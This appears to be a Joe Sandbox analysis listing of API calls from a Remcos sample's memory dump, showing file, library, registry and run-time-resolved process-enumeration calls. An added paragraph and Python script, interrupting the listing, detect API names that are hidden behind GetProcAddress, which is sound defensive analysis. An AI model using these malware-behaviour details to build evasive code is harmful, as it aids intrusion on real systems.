                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2154303073-0
                                                                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                          • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                          • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                                                                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$PointerRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3154509469-0
                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                          APIs
                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                          APIs
                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
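The entries above are Joe Sandbox's per-function API listing for the Remcos image dumped out of CasPol.exe (snapshot hcaresult_22_2_400000_CasPol.jbxd). The security-relevant detail is in the first complete entry: the image calls K32GetModuleFileNameExW directly but resolves EnumProcesses, EnumProcessModules, GetModuleFileNameExW and GetModuleInformation by name through GetProcAddress after naming psapi.dll. Those process-enumeration capabilities never appear in a static import table; only the strings passed to GetProcAddress reveal them. The script below is an added example, not part of the Joe Sandbox report and not code from the sample. It parses listing text of exactly the shape shown on this page (the "APIs" call lines, the "Snapshot File" line; any leading indentation is ignored), groups calls per snapshot, separates directly called APIs from names resolved at run time, and reports snapshots whose process-enumeration APIs exist only as GetProcAddress strings. The SAMPLE text is constructed from the entries on this page; the PROCESS_ENUM set and the treatment of any argument ending in .dll as a library name are this example's own assumptions.

```python
"""Parse Joe Sandbox-style 'APIs / Memory Dump Source' entries and separate
statically visible API calls from names resolved at run time via GetProcAddress.
Added example; the input format is the listing shown on this page."""
import re
from collections import defaultdict

# Constructed sample: four entries copied in the shape of the page's listing.
SAMPLE = """\
APIs
• Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
• Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
APIs
• ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
"""

# One API call line: optional "Part of subcall function XXXXXXXX:", then
# Name.MODULE(args), ref: XXXXXXXX. Names may contain '?' and '@' (C++ mangling).
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Z0-9]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$"
)
SNAPSHOT_LINE = re.compile(r"^•\s*Snapshot File:\s*(\S+)$")
HEX8 = re.compile(r"^[0-9A-F]{8}$")                 # a raw argument value, not a name
EXPORT_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")  # plausible exported symbol
# Assumption of this example: APIs whose presence means "can enumerate processes".
PROCESS_ENUM = {"EnumProcesses", "EnumProcessModules",
                "GetModuleFileNameExW", "GetModuleInformation"}


def split_entries(text):
    """Yield each entry's lines; an entry starts at a bare 'APIs' line.
    Leading indentation from the rendered report is discarded."""
    entry = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" and entry:
            yield entry
            entry = []
        if line:
            entry.append(line)
    if entry:
        yield entry


def parse_entry(lines):
    """Return (snapshot_file, [call dicts]) for one entry."""
    calls, snapshot = [], None
    for line in lines:
        m = API_LINE.match(line)
        if m:
            calls.append({"caller": m.group("caller"), "api": m.group("api"),
                          "module": m.group("module"), "ref": m.group("ref"),
                          "args": [a.strip() for a in m.group("args").split(",")]})
            continue
        m = SNAPSHOT_LINE.match(line)
        if m:
            snapshot = m.group(1)
    return snapshot, calls


def summarize(text):
    """Per snapshot: directly called APIs, names resolved via GetProcAddress,
    library names passed alongside, and the number of call sites."""
    out = defaultdict(lambda: {"direct": set(), "dynamic": set(),
                               "libraries": set(), "refs": 0})
    for lines in split_entries(text):
        snapshot, calls = parse_entry(lines)
        if snapshot is None:
            continue
        s = out[snapshot]
        for c in calls:
            s["refs"] += 1
            s["direct"].add(c["api"])
            if c["api"] == "GetProcAddress":
                for a in c["args"]:
                    if a.lower().endswith(".dll"):
                        s["libraries"].add(a.lower())
                    elif EXPORT_NAME.match(a) and not HEX8.match(a):
                        s["dynamic"].add(a)
    return dict(out)


def hidden_process_enumeration(summary):
    """Snapshots where process-enumeration APIs appear only as GetProcAddress
    strings, i.e. would be missing from the PE import table."""
    return sorted(snap for snap, s in summary.items()
                  if s["dynamic"] & PROCESS_ENUM and not (s["direct"] & PROCESS_ENUM))


if __name__ == "__main__":
    summary = summarize(SAMPLE)
    for snap, s in summary.items():
        print(snap, "call sites:", s["refs"])
        print("  direct :", sorted(s["direct"]))
        print("  dynamic:", sorted(s["dynamic"]), "via", sorted(s["libraries"]))
    print("process enumeration hidden behind GetProcAddress:",
          hidden_process_enumeration(summary))
```

On the sample, the K32GetModuleFileNameExW call shows up as a direct (statically visible) API, while the four psapi.dll names are only recoverable from the GetProcAddress string arguments, which is why a static import scan of the dumped image would understate its process-enumeration capability. When applying this to a full report export, feed it the whole function list; entries without a "Snapshot File" line are skipped rather than guessed.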
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
